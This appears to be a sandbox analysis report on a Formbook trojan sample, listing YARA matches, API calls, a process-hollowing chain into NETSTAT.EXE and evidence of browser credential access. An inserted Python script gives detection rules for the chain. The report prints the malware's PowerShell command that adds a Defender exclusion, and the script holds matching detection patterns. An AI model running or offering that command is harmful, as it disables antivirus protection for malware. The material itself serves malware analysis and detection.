            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: NETSTAT.EXE, 0000000B.00000003.2000233405.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: NETSTAT.EXE, 0000000B.00000002.2579150975.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: NETSTAT.EXE, 0000000B.00000002.2585369147.00000000080B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_0042C9B3 NtClose
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622B60 NtClose, LdrInitializeThunk
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622DF0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622C70 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_016235C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01624340 NtSetContextThread
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01624650 NtSuspendThread
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622BE0 NtQueryValueKey
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622BF0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622BA0 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622B80 NtQueryInformationFile
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622AF0 NtWriteFile
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622AD0 NtReadFile
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622AB0 NtWaitForSingleObject
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622D30 NtUnmapViewOfSection
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622D00 NtSetInformationFile
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622D10 NtMapViewOfSection
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622DD0 NtDelayExecution
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622DB0 NtEnumerateKey
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622C60 NtCreateKey
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622C00 NtQueryInformationProcess
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622CF0 NtOpenProcess
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622CC0 NtQueryVirtualMemory
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622CA0 NtQueryInformationToken
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622F60 NtCreateProcessEx
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622F30 NtCreateSection
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622FE0 NtCreateFile
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622FA0 NtQuerySection
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622FB0 NtResumeThread
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622F90 NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622E30 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622EE0 NtQueueApcThread
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622EA0 NtAdjustPrivilegesToken
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01622E80 NtReadVirtualMemory
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01623010 NtOpenDirectoryObject
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01623090 NtSetValueKey
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_016239B0 NtGetContextThread
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01623D70 NtOpenThread
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe; Code function: 4_2_01623D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03934340 NtSetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03934650 NtSuspendThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932BA0 NtEnumerateValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932BF0 NtAllocateVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932BE0 NtQueryValueKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932B60 NtClose, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932AD0 NtReadFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932AF0 NtWriteFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932FB0 NtResumeThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932FE0 NtCreateFile, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932F30 NtCreateSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932E80 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932EE0 NtQueueApcThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932DD0 NtDelayExecution, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932DF0 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932D10 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932D30 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932CA0 NtQueryInformationToken, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932C70 NtFreeVirtualMemory, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932C60 NtCreateKey, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_039335C0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_039339B0 NtGetContextThread, LdrInitializeThunk
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03932C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03933090 NtSetValueKey
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03933010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03933D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03933D70 NtOpenThread
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_030693B0 NtReadFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03069240 NtCreateFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_030696A0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_03069540 NtClose
            Source: C:\Windows\SysWOW64\NETSTAT.EXE; Code function: 11_2_030694A0 NtDeleteFile
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0397F290 appears 105 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 038EB970 appears 280 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 03947E54 appears 110 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0396EA12 appears 86 times
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 03935130 appears 58 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: String function: 0165EA12 appears 86 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: String function: 0166F290 appears 105 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: String function: 015DB970 appears 280 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: String function: 01625130 appears 58 times
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: String function: 01637E54 appears 110 times
            Source: NU1aAbSmCr.exe, 00000000.00000002.1349600533.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000000.00000000.1338330768.00000000006BC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametTOn.exeD vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000000.00000002.1373866867.0000000007A30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000016DD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe | Binary or memory string: OriginalFilenametTOn.exeD vs NU1aAbSmCr.exe
            Source: NU1aAbSmCr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 4.2.NU1aAbSmCr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (rule metadata: reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 4.2.NU1aAbSmCr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: NU1aAbSmCr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, XWwa6bWsPleF4dvV8t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, XWwa6bWsPleF4dvV8t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.cs | Security API names: _0020.AddAccessRule
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/7@5/5
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NU1aAbSmCr.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixrxqhbp.4x5.ps1
            Source: NU1aAbSmCr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: NU1aAbSmCr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: NETSTAT.EXE, 0000000B.00000003.2001188381.0000000003343000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2579150975.0000000003364000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.2001296966.0000000003364000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2579150975.0000000003391000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NU1aAbSmCr.exe | ReversingLabs: Detection: 65%
            Source: unknown | Process created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Process created: C:\Users\user\Desktop\NU1aAbSmCr.exe "C:\Users\user\Desktop\NU1aAbSmCr.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
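            The process chain above (NU1aAbSmCr.exe spawning powershell.exe with Add-MpPreference -ExclusionPath, then mCFHCvdrqdDiDT.exe launching NETSTAT.EXE, which in turn launches firefox.exe) is what a detection engineer keys on. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it runs three rules over constructed process-creation events modelled on these lines. The explorer.exe parent of the first process (the report lists it as unknown) and the cmd.exe control case are assumptions, and the ipconfig.exe/nslookup.exe watchlist entries are assumed additions beyond the one utility seen here. It decodes PowerShell -EncodedCommand payloads before matching, so the base64 variant of the same cmdlet is caught as well. Because mCFHCvdrqdDiDT.exe carries a Joe Sandbox FakeChrome PDB path further down this page, the name of the hollowed parent will differ outside the sandbox; the rules therefore match on the netstat.exe-to-browser relationship rather than on that name.

```python
import base64
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # ParentImage
    image: str    # Image
    cmdline: str  # CommandLine


# Interactive shells from which netstat is normally run.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
# System utilities used as hollowing hosts. netstat.exe is the one in this report;
# the other two are assumed watchlist additions.
SYSTEM_UTILITIES = {"netstat.exe", "ipconfig.exe", "nslookup.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}

# powershell -e/-ec/-enc/-EncodedCommand <base64 of a UTF-16LE script>
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Add-/Set-MpPreference with an exclusion or a Disable* switch is Defender tampering.
MP_TAMPER = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-(?:Exclusion(?:Path|Process|Extension)|Disable\w+)",
    re.I | re.S)


def effective_cmdline(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so the rules see the real script."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " ;decoded: " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64/UTF-16: leave it for the analyst
        return cmdline


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def triage(events):
    """Return (rule, image, detail) for every event matching one of the three rules."""
    hits = []
    for ev in events:
        image, parent = _name(ev.image), _name(ev.parent)
        cmd = effective_cmdline(ev.cmdline)
        if image in {"powershell.exe", "pwsh.exe"} and MP_TAMPER.search(cmd):
            hits.append(("defender_exclusion_tamper", ev.image, cmd))
        if image in SYSTEM_UTILITIES and parent not in SHELLS:
            hits.append(("system_utility_unusual_parent", ev.image, ev.parent))
        if image in BROWSERS and parent in SYSTEM_UTILITIES:
            hits.append(("system_utility_spawns_browser", ev.image, ev.parent))
    return hits


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
          r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"')
DROPPER = r"C:\Users\user\Desktop\NU1aAbSmCr.exe"
HOST = r"C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe"
NETSTAT = r"C:\Windows\SysWOW64\NETSTAT.EXE"

# Constructed events modelled on the report's process chain (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", DROPPER, f'"{DROPPER}"'),   # parent assumed
    ProcEvent(DROPPER, PS, PS_CMD),
    ProcEvent(DROPPER, PS, "powershell.exe -EncodedCommand " + base64.b64encode(
        f'Add-MpPreference -ExclusionPath "{DROPPER}"'.encode("utf-16-le")).decode()),
    ProcEvent(DROPPER, DROPPER, f'"{DROPPER}"'),
    ProcEvent(HOST, NETSTAT, f'"{NETSTAT}"'),
    ProcEvent(NETSTAT, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\NETSTAT.EXE",
              "netstat -ano"),                                          # benign control
]

if __name__ == "__main__":
    for rule, image, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:32} {image}\n    {detail}")
```

            The benign cmd.exe-to-netstat.exe event produces no hit, which is the point of anchoring the utility rule on the parent rather than on netstat.exe itself; in production the SHELLS and SYSTEM_UTILITIES sets should come from your own baseline.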
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Sections loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll (loaded twice), kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll (loaded twice), gpapi.dll
